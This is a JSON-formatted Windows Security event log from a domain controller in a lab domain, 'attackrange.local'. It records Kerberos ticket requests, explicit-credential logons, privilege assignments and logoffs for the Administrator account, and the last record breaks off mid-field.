{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220623,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220624,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220625,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E16B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8e16b","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220626,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E16B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x8e16b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220627,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F75D\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7f75d","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220628,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E16B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8e16b","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220629,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220630,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220631,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220632,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E1AD\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8e1ad","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220633,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E1AD\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x8e1ad","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220634,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220635,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220636,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nTarget Server:\r\n\tTarget Server 